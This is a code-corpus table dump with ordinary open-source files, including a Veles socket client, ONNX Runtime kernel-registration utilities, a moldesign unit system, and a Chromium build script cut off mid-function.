max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
zeus/api/resources/revision_file_coverage.py | conrad-kronos/zeus | 221 | 12684452 | from flask import request
from operator import or_
from zeus.models import FileCoverage, Revision
from zeus.utils.builds import fetch_build_for_revision
from .base_revision import BaseRevisionResource
from ..schemas import FileCoverageSchema
filecoverage_schema = FileCoverageSchema(many=True)
class RevisionFileCoverageResource(BaseRevisionResource):
def get(self, revision: Revision):
"""
Return a list of file coverage objects for a given revision.
"""
build = fetch_build_for_revision(revision)
if not build:
return self.respond(status=404)
build_ids = [original.id for original in build.original]
query = FileCoverage.query.filter(FileCoverage.build_id.in_(build_ids))
diff_only = request.args.get("diff_only") in ("1", "yes", "true")
if diff_only:
query = query.filter(
or_(
FileCoverage.diff_lines_covered > 0,
FileCoverage.diff_lines_uncovered > 0,
)
)
query = query.order_by(
(
FileCoverage.diff_lines_covered + FileCoverage.diff_lines_uncovered > 0
).desc(),
FileCoverage.filename.asc(),
)
return self.respond_with_schema(filecoverage_schema, query)
|
test/Decider/switch-rebuild.py | Valkatraz/scons | 1,403 | 12684457 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test that switching Decider() types between MD5 and timestamp-match
does not cause unnecessary rebuilds.
"""
import TestSCons
test = TestSCons.TestSCons(match=TestSCons.match_re_dotall)
base_sconstruct_contents = """\
DefaultEnvironment(tools=[])
Decider('%s')
def build(env, target, source):
with open(str(target[0]), 'wt') as f, open(str(source[0]), 'rt') as ifp:
f.write(ifp.read())
B = Builder(action=build)
env = Environment(tools=[], BUILDERS = { 'B' : B })
env.B(target='switch.out', source='switch.in')
"""
def write_SConstruct(test, sig_type):
contents = base_sconstruct_contents % sig_type
test.write('SConstruct', contents)
# Build first MD5 checksums.
write_SConstruct(test, 'MD5')
test.write('switch.in', "switch.in\n")
switch_out_switch_in = test.wrap_stdout(r'build\(\["switch.out"\], \["switch.in"\]\)\n')
test.run(arguments='switch.out', stdout=switch_out_switch_in)
test.up_to_date(arguments='switch.out')
# Now rebuild with timestamp-match. Because we always store timestamps,
# even when making the decision based on MD5 checksums, the build is
# still up to date.
write_SConstruct(test, 'timestamp-match')
test.up_to_date(arguments='switch.out')
# Now switch back to MD5 checksums. When we rebuilt with the timestamp,
# it wiped out the MD5 value (because the point of timestamps is to not
# open up and checksum the contents), so the file is considered *not*
# up to date and must be rebuilt to generate a checksum.
write_SConstruct(test, 'MD5')
test.not_up_to_date(arguments='switch.out')
# And just for good measure, make sure that we now rebuild in response
# to a content change.
test.write('switch.in', "switch.in 2\n")
test.run(arguments='switch.out', stdout=switch_out_switch_in)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
python/veles/scli/client.py | pombredanne/veles | 918 | 12684471 | # Copyright 2017 CodiLime
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import socket
import ssl
import msgpack
from veles.proto import messages, msgpackwrap
from veles.proto.messages import PROTO_VERSION
from veles.schema import nodeid
from veles.util import helpers
class Client(object):
def __init__(self, sock, key, name='scli', version='1.0',
description='', type='scli', quit_on_close=False):
self.sock = sock
wrapper = msgpackwrap.MsgpackWrapper()
self.unpacker = wrapper.unpacker
self.packer = wrapper.packer
self.client_name = name
self.client_version = version
self.client_description = description
self.client_type = type
self.quit_on_close = quit_on_close
self._authorize(helpers.prepare_auth_key(key))
def _authorize(self, key):
self.sock.sendall(key)
self.send_msg(messages.MsgConnect(
proto_version=PROTO_VERSION,
client_name=self.client_name,
client_version=self.client_version,
client_description=self.client_description,
client_type=self.client_type,
quit_on_close=self.quit_on_close,
))
pkt = self.getpkt()
if isinstance(pkt, messages.MsgConnected):
print('Connected to server: {}'.format(pkt.server_name))
elif isinstance(pkt, messages.MsgConnectionError):
raise pkt.err
else:
print(pkt)
raise Exception('weird reply when attempting to connect')
def getpkt(self):
while True:
try:
return messages.MsgpackMsg.load(self.unpacker.unpack())
except msgpack.OutOfData:
pass
data = self.sock.recv(1024)
if not data:
raise Exception("end of file")
self.unpacker.feed(data)
def send_msg(self, msg):
self.sock.sendall(self.packer.pack(msg.dump()))
def request(self, msg):
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgRequestAck) and pkt.rid == 0:
return msg.id
elif isinstance(pkt, messages.MsgRequestError) and pkt.rid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to request')
def create(self, parent, tags=set(), attr={}, data={}, bindata={},
pos=(None, None)):
msg = messages.MsgCreate(
id=nodeid.NodeID(),
parent=parent,
pos_start=pos[0],
pos_end=pos[1],
tags=tags,
attr=attr,
data=data,
bindata=bindata,
rid=0,
)
self.request(msg)
return msg.id
def delete(self, obj):
msg = messages.MsgDelete(
id=obj,
rid=0
)
self.request(msg)
def set_parent(self, obj, parent):
msg = messages.MsgSetParent(
id=obj,
parent=parent,
rid=0
)
self.request(msg)
def set_pos(self, obj, start, end):
msg = messages.MsgSetPos(
id=obj,
pos_start=start,
pos_end=end,
rid=0
)
self.request(msg)
def add_tag(self, obj, tag):
msg = messages.MsgAddTag(
id=obj,
tag=tag,
rid=0
)
self.request(msg)
def del_tag(self, obj, tag):
msg = messages.MsgDelTag(
id=obj,
tag=tag,
rid=0
)
self.request(msg)
def set_attr(self, obj, key, data):
msg = messages.MsgSetAttr(
id=obj,
key=key,
data=data,
rid=0
)
self.request(msg)
def set_data(self, obj, key, data):
msg = messages.MsgSetData(
id=obj,
rid=0,
key=key,
data=data,
)
self.request(msg)
def set_bindata(self, obj, key, start, data, truncate=False):
msg = messages.MsgSetBinData(
id=obj,
rid=0,
key=key,
start=start,
data=data,
truncate=truncate,
)
self.request(msg)
def get(self, obj):
msg = messages.MsgGet(
id=obj,
qid=0,
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetReply) and pkt.qid == 0:
return pkt.obj
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get')
def get_sub(self, obj):
msg = messages.MsgGet(
id=obj,
qid=0,
sub=True,
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetReply) and pkt.qid == 0:
yield pkt.obj
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get')
def get_data(self, obj, key):
msg = messages.MsgGetData(
id=obj,
qid=0,
key=key,
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetDataReply) and pkt.qid == 0:
return pkt.data
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get_data')
def get_data_sub(self, obj, key):
msg = messages.MsgGetData(
id=obj,
qid=0,
key=key,
sub=True
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetDataReply) and pkt.qid == 0:
yield pkt.data
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get_data')
def get_bindata(self, obj, key, start=0, end=None):
msg = messages.MsgGetBinData(
id=obj,
qid=0,
key=key,
start=start,
end=end,
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetBinDataReply) and pkt.qid == 0:
return pkt.data
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get_bindata')
def get_bindata_sub(self, obj, key, start=0, end=None):
msg = messages.MsgGetBinData(
id=obj,
qid=0,
key=key,
start=start,
end=end,
sub=True,
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetBinDataReply) and pkt.qid == 0:
yield pkt.data
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get_bindata')
def list(self, obj):
msg = messages.MsgGetList(
qid=0,
parent=obj,
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetListReply) and pkt.qid == 0:
return pkt.objs
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to list')
def list_sub(self, obj):
msg = messages.MsgGetList(
qid=0,
parent=obj,
sub=True
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetListReply) and pkt.qid == 0:
yield pkt
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to list')
def query(self, obj, sig, params, checks=None):
params = sig.params.dump(params)
msg = messages.MsgGetQuery(
qid=0,
node=obj,
query=sig.name,
params=params,
trace=checks is not None
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetQueryReply) and pkt.qid == 0:
if checks is not None:
checks += pkt.checks
return sig.result.load(pkt.result)
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
if checks is not None:
checks += pkt.checks
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to get_query')
def query_sub(self, obj, sig, params, checks=None):
params = sig.params.dump(params)
msg = messages.MsgGetQuery(
qid=0,
node=obj,
query=sig.name,
params=params,
trace=checks is not None,
sub=True
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetQueryReply) and pkt.qid == 0:
if checks is not None:
checks += pkt.checks
yield sig.result.load(pkt.result)
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
if checks is not None:
checks += pkt.checks
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to get_query')
def run_method(self, obj, sig, params):
params = sig.params.dump(params)
msg = messages.MsgMethodRun(
mid=0,
node=obj,
method=sig.name,
params=params
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgMethodResult) and pkt.mid == 0:
return sig.result.load(pkt.result)
elif isinstance(pkt, messages.MsgMethodError) and pkt.mid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to run_method')
def run_broadcast(self, sig, params):
params = sig.params.dump(params)
msg = messages.MsgBroadcastRun(
bid=0,
broadcast=sig.name,
params=params
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgBroadcastResult) and pkt.bid == 0:
return [sig.result.load(result) for result in pkt.results]
else:
print(pkt)
raise Exception('weird reply to run_broadcast')
def list_connections(self):
msg = messages.MsgListConnections(
qid=0,
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgConnectionsReply) and pkt.qid == 0:
return pkt.connections
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to list_connections')
def list_connections_sub(self):
msg = messages.MsgListConnections(
qid=0,
sub=True
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgConnectionsReply) and pkt.qid == 0:
yield pkt
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to list_connections')
class UnixClient(Client):
def __init__(self, path, key, **kwargs):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(path)
super(UnixClient, self).__init__(sock, key, **kwargs)
class TcpClient(Client):
def __init__(self, ip, port, key, **kwargs):
sock = socket.create_connection((ip, port))
super(TcpClient, self).__init__(sock, key, **kwargs)
class SslClient(Client):
def __init__(self, ip, port, key, fingerprint, **kwargs):
sock = socket.create_connection((ip, port))
sc = ssl.SSLContext()
sock = sc.wrap_socket(sock)
cert = sock.getpeercert(True)
helpers.validate_cert(cert, fingerprint)
super(SslClient, self).__init__(sock, key, **kwargs)
def create_client(url):
url = helpers.parse_url(url)
if url.scheme == helpers.UrlScheme.UNIX_SCHEME:
return UnixClient(url.path, url.auth_key)
elif url.scheme == helpers.UrlScheme.TCP_SCHEME:
return TcpClient(url.host, url.port, url.auth_key)
elif url.scheme == helpers.UrlScheme.SSL_SCHEME:
return SslClient(url.host, url.port, url.auth_key, url.fingerprint)
else:
raise ValueError('Wrong scheme provided!')
|
blender_rendering/utils/fbx2bvh.py | yujiatay/deep-motion-editing | 966 | 12684476 | <reponame>yujiatay/deep-motion-editing
import bpy
import numpy as np
from os import listdir, path
def fbx2bvh(data_path, file):
sourcepath = data_path+"/"+file
bvh_path = data_path+"/"+file.split(".fbx")[0]+".bvh"
bpy.ops.import_scene.fbx(filepath=sourcepath)
frame_start = 9999
frame_end = -9999
action = bpy.data.actions[-1]
if action.frame_range[1] > frame_end:
frame_end = action.frame_range[1]
if action.frame_range[0] < frame_start:
frame_start = action.frame_range[0]
frame_end = np.max([60, frame_end])
bpy.ops.export_anim.bvh(filepath=bvh_path,
frame_start=frame_start,
frame_end=frame_end, root_transform_only=True)
bpy.data.actions.remove(bpy.data.actions[-1])
print(data_path+"/"+file+" processed.")
if __name__ == '__main__':
data_path = "./fbx/"
directories = sorted([f for f in listdir(data_path) if not f.startswith(".")])
for d in directories:
files = sorted([f for f in listdir(data_path+d) if f.endswith(".fbx")])
for file in files:
fbx2bvh(path.join(data_path,d), file)
|
social/apps/django_app/default/config.py | raccoongang/python-social-auth | 1,987 | 12684490 | from social_django.config import PythonSocialAuthConfig
|
tools/ci_build/op_registration_utils.py | kimjungwow/onnxruntime-riscv | 6,036 | 12684509 | # !/usr/bin/env python3
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
'''
Utilities to help process files containing kernel registrations.
'''
import os
import sys
import typing
from logger import get_logger
log = get_logger("op_registration_utils")
def map_ort_constant_to_domain(ort_constant_name: str):
'''
Map the name of the internal ONNX Runtime constant used in operator kernel registrations to the domain name
used in ONNX models and configuration files.
:param ort_constant_name: ONNX Runtime constant name for the domain from a kernel registration entry.
:return: String with public domain name.
'''
# constants are defined in <ORT root>/include/onnxruntime/core/graph/constants.h
constant_to_domain_map = {'kOnnxDomain': 'ai.onnx',
'kMLDomain': 'ai.onnx.ml',
'kMSDomain': 'com.microsoft',
'kMSExperimentalDomain': 'com.microsoft.experimental',
'kMSNchwcDomain': 'com.microsoft.nchwc',
'kMSFeaturizersDomain': 'com.microsoft.mlfeaturizers',
'kMSDmlDomain': 'com.microsoft.dml',
'kNGraphDomain': 'com.intel.ai',
'kVitisAIDomain': 'com.xilinx'}
if ort_constant_name in constant_to_domain_map:
return constant_to_domain_map[ort_constant_name]
else:
log.warning('Unknown domain for ONNX Runtime constant of {}.'.format(ort_constant_name))
return None
def get_kernel_registration_files(ort_root=None, include_cuda=False):
'''
Return paths to files containing kernel registrations for CPU and CUDA providers.
:param ort_root: ORT repository root directory. Inferred from the location of this script if not provided.
:param include_cuda: Include the CUDA registrations in the list of files.
:return: list[str] containing the kernel registration filenames.
'''
if not ort_root:
ort_root = os.path.dirname(os.path.abspath(__file__)) + '/../..'
provider_path = ort_root + '/onnxruntime/core/providers/{ep}/{ep}_execution_provider.cc'
contrib_provider_path = ort_root + '/onnxruntime/contrib_ops/{ep}/{ep}_contrib_kernels.cc'
training_provider_path = ort_root + '/orttraining/orttraining/training_ops/{ep}/{ep}_training_kernels.cc'
provider_paths = [provider_path.format(ep='cpu'),
contrib_provider_path.format(ep='cpu'),
training_provider_path.format(ep='cpu')]
if include_cuda:
provider_paths.append(provider_path.format(ep='cuda'))
provider_paths.append(contrib_provider_path.format(ep='cuda'))
provider_paths.append(training_provider_path.format(ep='cuda'))
provider_paths = [os.path.abspath(p) for p in provider_paths]
return provider_paths
class RegistrationProcessor:
'''
Class to process lines that are extracted from a kernel registration file.
For each kernel registration, process_registration is called.
For all other lines, process_other_line is called.
'''
def process_registration(self, lines: typing.List[str], domain: str, operator: str,
start_version: int, end_version: typing.Optional[int] = None,
type: typing.Optional[str] = None):
'''
Process lines that contain a kernel registration.
:param lines: Array containing the original lines containing the kernel registration.
:param domain: Domain for the operator
:param operator: Operator type
:param start_version: Start version
:param end_version: End version or None if unversioned registration
:param type: Type used in registration, if this is a typed registration
'''
pass
def process_other_line(self, line):
'''
Process a line that does not contain a kernel registration
:param line: Original line
'''
pass
def ok(self):
'''
Get overall status for processing
:return: True if successful. False if not. Error will be logged as the registrations are processed.
'''
return False # return False as the derived class must override to report the real status
def _process_lines(lines: typing.List[str], offset: int, registration_processor: RegistrationProcessor):
'''
Process one or more lines that contain a kernel registration.
Merge lines if split over multiple, and call registration_processor.process_registration with the original lines
and the registration information.
:return: Offset for first line that was not consumed.
'''
onnx_op = 'ONNX_OPERATOR_KERNEL_CLASS_NAME'
onnx_op_len = len(onnx_op)
onnx_typed_op = 'ONNX_OPERATOR_TYPED_KERNEL_CLASS_NAME'
onnx_typed_op_len = len(onnx_typed_op)
onnx_versioned_op = 'ONNX_OPERATOR_VERSIONED_KERNEL_CLASS_NAME'
onnx_versioned_op_len = len(onnx_versioned_op)
onnx_versioned_typed_op = 'ONNX_OPERATOR_VERSIONED_TYPED_KERNEL_CLASS_NAME'
onnx_versioned_typed_op_len = len(onnx_versioned_typed_op)
end_marks = tuple([');', ')>', ')>,', ')>,};', ')>};'])
end_mark = ''
lines_to_process = []
# merge line if split over multiple.
# original lines will be in lines_to_process. merged and stripped line will be in code_line
while True:
lines_to_process.append(lines[offset])
stripped = lines[offset].strip()
line_end = False
for mark in end_marks:
if stripped.endswith(mark):
end_mark = mark
line_end = True
break
if line_end:
break
offset += 1
if offset > len(lines):
log.error('Past end of input lines looking for line terminator.')
sys.exit(-1)
code_line = ''.join([line.strip() for line in lines_to_process])
if onnx_op in code_line:
# e.g. BuildKernelCreateInfo<ONNX_OPERATOR_KERNEL_CLASS_NAME(
# kCpuExecutionProvider, kOnnxDomain, 7, Cos)>,
trim_at = code_line.index(onnx_op) + onnx_op_len + 1
*_, domain, start_version, op_type = \
[arg.strip() for arg in code_line[trim_at: -len(end_mark)].split(',')]
registration_processor.process_registration(lines_to_process, domain, op_type,
int(start_version), None, None)
elif onnx_typed_op in code_line:
# e.g. BuildKernelCreateInfo<ONNX_OPERATOR_TYPED_KERNEL_CLASS_NAME(
# kCpuExecutionProvider, kOnnxDomain, 7, double, Sin)>,
trim_at = code_line.index(onnx_typed_op) + onnx_typed_op_len + 1
*_, domain, start_version, type, op_type = \
[arg.strip() for arg in code_line[trim_at: -len(end_mark)].split(',')]
registration_processor.process_registration(lines_to_process, domain, op_type,
int(start_version), None, type)
elif onnx_versioned_op in code_line:
# e.g. BuildKernelCreateInfo<ONNX_OPERATOR_VERSIONED_KERNEL_CLASS_NAME(
# kCpuExecutionProvider, kOnnxDomain, 1, 10, Hardmax)>,
trim_at = code_line.index(onnx_versioned_op) + onnx_versioned_op_len + 1
*_, domain, start_version, end_version, op_type = \
[arg.strip() for arg in code_line[trim_at: -len(end_mark)].split(',')]
registration_processor.process_registration(lines_to_process, domain, op_type,
int(start_version), int(end_version), None)
elif onnx_versioned_typed_op in code_line:
# e.g. BuildKernelCreateInfo<ONNX_OPERATOR_VERSIONED_TYPED_KERNEL_CLASS_NAME(
# kCpuExecutionProvider, kOnnxDomain, 1, 10, float, LogSoftmax)>,
trim_at = code_line.index(onnx_versioned_typed_op) + onnx_versioned_typed_op_len + 1
*_, domain, start_version, end_version, type, op_type = \
[arg.strip() for arg in code_line[trim_at: -len(end_mark)].split(',')]
registration_processor.process_registration(lines_to_process, domain, op_type,
int(start_version), int(end_version), type)
else:
log.warning("Ignoring unhandled kernel registration variant: {}".format(code_line))
for line in lines_to_process:
registration_processor.process_other_line(line)
return offset + 1
def process_kernel_registration_file(filename: str, registration_processor: RegistrationProcessor):
'''
Process a kernel registration file using registration_processor.
:param filename: Path to file containing kernel registrations.
:param registration_processor: Processor to be used.
:return True if processing was successful.
'''
if not os.path.isfile(filename):
log.error('File not found: {}'.format(filename))
return False
lines = []
with open(filename, 'r') as file_to_read:
lines = file_to_read.readlines()
offset = 0
while offset < len(lines):
line = lines[offset]
stripped = line.strip()
if stripped.startswith('BuildKernelCreateInfo<ONNX'):
offset = _process_lines(lines, offset, registration_processor)
else:
registration_processor.process_other_line(line)
offset += 1
|
sympy/utilities/__init__.py | nashalex/sympy | 8,323 | 12684550 | """This module contains some general purpose utilities that are used across
SymPy.
"""
from .iterables import (flatten, group, take, subsets,
variations, numbered_symbols, cartes, capture, dict_merge,
prefixes, postfixes, sift, topological_sort, unflatten,
has_dups, has_variety, reshape, default_sort_key, ordered,
rotations)
from .misc import filldedent
from .lambdify import lambdify
from .source import source
from .decorator import threaded, xthreaded, public, memoize_property
from .timeutils import timed
__all__ = [
'flatten', 'group', 'take', 'subsets', 'variations', 'numbered_symbols',
'cartes', 'capture', 'dict_merge', 'prefixes', 'postfixes', 'sift',
'topological_sort', 'unflatten', 'has_dups', 'has_variety', 'reshape',
'default_sort_key', 'ordered', 'rotations',
'filldedent',
'lambdify',
'source',
'threaded', 'xthreaded', 'public', 'memoize_property',
'timed',
]
|
test/lib/__init__.py | noryb009/rmc | 164 | 12684599 | from acceptance_test_case import AcceptanceTestCase # @UnusedImport
from flask_test_case import FlaskTestCase # @UnusedImport
from model_test_case import ModelTestCase # @UnusedImport
from fixtures_test_case import FixturesTestCase # @UnusedImport
|
src/python/tldrstory/database.py | neuml/tldrstory | 260 | 12684603 | <reponame>neuml/tldrstory<filename>src/python/tldrstory/database.py
"""
Database module
"""
class Database(object):
"""
Defines data structures and methods to store article content.
"""
def save(self, article):
"""
Saves an article.
Args:
article: article metadata and text content
"""
def complete(self):
"""
Signals processing is complete and runs final storage methods.
"""
def close(self):
"""
Commits and closes the database.
"""
|
tests/parser/globals/test_globals.py | upgradvisor/vyper | 1,471 | 12684622 | <reponame>upgradvisor/vyper<filename>tests/parser/globals/test_globals.py
from pytest import raises
from vyper.exceptions import UndeclaredDefinition
def test_permanent_variables_test(get_contract_with_gas_estimation):
permanent_variables_test = """
struct Var:
a: int128
b: int128
var: Var
@external
def __init__(a: int128, b: int128):
self.var.a = a
self.var.b = b
@external
def returnMoose() -> int128:
return self.var.a * 10 + self.var.b
"""
c = get_contract_with_gas_estimation(permanent_variables_test, *[5, 7])
assert c.returnMoose() == 57
print("Passed init argument and variable member test")
def test_missing_global(get_contract):
code = """
@external
def a() -> int128:
return self.b
"""
with raises(UndeclaredDefinition):
get_contract(code)
|
moldesign/units/unitsystem.py | Autodesk/molecular-design-toolkit | 147 | 12684638 | <filename>moldesign/units/unitsystem.py
from __future__ import print_function, absolute_import, division
from future.builtins import *
from future import standard_library
standard_library.install_aliases()
# Copyright 2017 Autodesk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .constants import *
class UnitSystem(object):
""" Class for standardizing units - specifies preferred units for length, mass, energy etc.
In MDT, many methods will automatically convert output using the UnitSystem at
``moldesign.units.default``
Args:
length (MdtUnit): length units
mass (MdtUnit): mass units
time (MdtUnit): time units
energy (MdtUnit): energy units
temperature (MdtUnit): temperature units (default: kelvin)
force (MdtUnit): force units (default: energy/length)
momentum (MdtUnit): momentum units (default: mass * length / time)
angle (MdtUnit): angle units (default: radians)
charge (MdtUnit): charge units (default: fundamental charge)
"""
def __init__(self, length, mass, time, energy,
temperature=kelvin,
force=None, momentum=None,
angle=radians,
charge=q_e):
self.length = length
self.mass = mass
self.time = time
self.energy = energy
self.temperature = temperature
self.force = force
self.momentum = momentum
self.angle = angle
self.charge = charge
def __getitem__(self, item):
""" For convenience when using pint dimensionality descriptions.
This aliases self['item'] = self['[item]'] = self.item,
e.g. self['length'] = self['[length]'] = self.length
"""
itemname = item.lstrip('[').rstrip(']')
return getattr(self, itemname)
@property
def force(self):
if self._force is None:
return self.energy / self.length
else:
return self._force
@force.setter
def force(self, f):
self._force = f
@property
def momentum(self):
if self._momentum is None:
return self.mass * self.length / self.time
else:
return self._momentum
@momentum.setter
def momentum(self, f):
self._momentum = f
def convert(self, quantity):
""" Convert a quantity into this unit system.
Args:
quantity (MdtQuantity or MdtUnit): quantity to convert
"""
baseunit = self.get_baseunit(quantity)
if baseunit == ureg.dimensionless:
return quantity * ureg.dimensionless
else:
result = quantity.to(baseunit)
return result
def get_default(self, q):
""" Return the default unit system for objects with these dimensions
Args:
q (MdtQuantity or MdtUnit): quantity to get default units for
Returns:
MdtUnit: Proper units for this quantity
"""
return self.get_baseunit(1.0 * q).units
def convert_if_possible(self, quantity):
if isinstance(quantity, MdtQuantity):
return self.convert(quantity)
else:
return quantity
def get_baseunit(self, quantity):
""" Get units of a quantity, list or array
Args:
quantity (Any): any number or list-like object with units
Raises:
TypeError: if the passed object cannot have units (e.g., it's a string or ``None``)
Returns:
MdtUnit: units found in the passed object
"""
try:
dims = dict(quantity.dimensionality)
except AttributeError:
try:
q = quantity[0]
except (TypeError, StopIteration):
if isinstance(quantity, (int, float, complex)):
return ureg.dimensionless
raise TypeError('This type of object cannot have physical units')
if isinstance(q, str):
raise TypeError('This type of object cannot have physical units')
try:
return self.get_baseunit(q)
except (IndexError, TypeError): # Assume dimensionless
return ureg.dimensionless
baseunit = ureg.dimensionless
# Factor out force units
if self._force:
if '[length]' in dims and '[mass]' in dims and '[time]' in dims:
while dims['[length]'] >= 1 and dims['[mass]'] >= 1 and dims['[time]'] <= -2:
baseunit *= self['force']
dims['[length]'] -= 1
dims['[mass]'] -= 1
dims['[time]'] += 2
# Factor out energy units
if '[length]' in dims and '[mass]' in dims and '[time]' in dims:
while dims['[length]'] >= 1 and dims['[mass]'] >= 1 and dims['[time]'] <= -2:
baseunit *= self['energy']
dims['[length]'] -= 2
dims['[mass]'] -= 1
dims['[time]'] += 2
# Factor out momentum units
if self._momentum:
if '[length]' in dims and '[mass]' in dims and '[time]' in dims:
while dims['[length]'] >= 1 and dims['[mass]'] >= 1 and dims['[time]'] <= -1:
baseunit *= self['momentum']
dims['[length]'] -= 1
dims['[mass]'] -= 1
dims['[time]'] += 1
if '[current]' in dims:
dims.setdefault('[charge]', 0)
dims.setdefault('[time]', 0)
dims['[charge]'] += dims['[current]']
dims['[time]'] -= dims['[current]']
dims.pop('[current]')
# Otherwise, just use the units
for unit in dims:
if dims[unit] == 0:
continue
try:
baseunit *= self[unit]**dims[unit]
except AttributeError:
baseunit *= ureg[unit]**dims[unit]
return baseunit.units
default = UnitSystem(length=angstrom, mass=amu, time=fs, energy=eV)
atomic_units = UnitSystem(length=a0, mass=m_e, time=t0, energy=hartree)
nano_si = UnitSystem(length=nm, mass=dalton, time=fs, energy=kjpermol) |
tools/win/link_limiter/build_link_limiter.py | kjthegod/chromium | 2,151 | 12684655 | <reponame>kjthegod/chromium
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import os
import shutil
import subprocess
import sys
import tempfile
BUILD_DIR = 'build'
def run_with_vsvars(cmd, tmpdir=None):
fd, filename = tempfile.mkstemp('.bat', text=True)
with os.fdopen(fd, 'w') as f:
print >> f, '@echo off'
print >> f, r'call "%VS100COMNTOOLS%\vsvars32.bat"'
if tmpdir:
print >> f, r'cd %s' % tmpdir
print >> f, cmd
try:
p = subprocess.Popen([filename], shell=True, stdout=subprocess.PIPE,
universal_newlines=True)
out, _ = p.communicate()
return p.returncode, out
finally:
os.unlink(filename)
def get_vc_dir():
_, out = run_with_vsvars('echo VCINSTALLDIR=%VCINSTALLDIR%')
for line in out.splitlines(): # pylint: disable-msg=E1103
if line.startswith('VCINSTALLDIR='):
return line[len('VCINSTALLDIR='):]
return None
def build(infile):
if not os.path.exists(BUILD_DIR):
os.makedirs(BUILD_DIR)
outfile = 'limiter.exe'
outpath = os.path.join(BUILD_DIR, outfile)
cpptime = os.path.getmtime(infile)
if not os.path.exists(outpath) or cpptime > os.path.getmtime(outpath):
print 'Building %s...' % outfile
rc, out = run_with_vsvars(
